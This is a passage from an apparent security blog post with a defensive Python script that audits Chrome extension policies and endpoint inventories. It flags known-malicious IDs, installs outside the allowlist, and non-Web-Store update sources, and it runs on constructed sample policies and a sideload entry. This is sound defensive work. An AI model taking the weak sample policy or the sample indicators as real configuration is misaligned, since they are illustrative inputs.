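        findings.append("SafeBrowsingProtectionLevel is 0 (no protection), below Standard")
    return findings


def audit_inventory(installed, policy):
    """installed: {extension_id: update_url} collected from endpoints. Flags IOCs, anything
    outside the allowlist, and anything whose updates do not come from the Web Store."""
    allow = set(policy.get("ExtensionInstallAllowlist", []))
    findings = []
    for ext_id, update_url in installed.items():
        if ext_id in KNOWN_MALICIOUS:
            findings.append(f"{ext_id}: known malicious ({KNOWN_MALICIOUS[ext_id]})")
        if ext_id not in allow:
            findings.append(f"{ext_id}: not on the allowlist")
        if update_url != WEBSTORE_UPDATE_URL:
            findings.append(f"{ext_id}: update_url {update_url} is not the Chrome Web Store")
    return findings


# Constructed sample input. ALLOWED is a placeholder ID, not a real extension.
ALLOWED = "abcdefghijklmnop" * 2
WEAK_POLICY = {
    "ExtensionInstallAllowlist": [ALLOWED, "not-an-id"],
    "ExtensionInstallSources": ["https://*.extore.space/*"],
}
HARDENED_POLICY = {
    "ExtensionInstallBlocklist": ["*"],
    "ExtensionInstallAllowlist": [ALLOWED],
    "SafeBrowsingProtectionLevel": 1,
}
SAMPLE_INVENTORY = {
    ALLOWED: WEBSTORE_UPDATE_URL,
    "djdcfiocijfjponepmbbdmbeblofhfff": "https://updates.example/crx",  # constructed sideload source
}

if __name__ == "__main__":
    print("weak policy:", audit_policy(WEAK_POLICY))
    print("hardened policy:", audit_policy(HARDENED_POLICY))
    print("inventory:", audit_inventory(SAMPLE_INVENTORY, HARDENED_POLICY))
```

The policy audit is the preventive half; the inventory audit is what catches extensions that were installed before the policy existed, or that arrived through the other three routes described in the post (poisoned updates, purchased extensions, extensions dropping other extensions), since those can carry a valid ID and still be malicious.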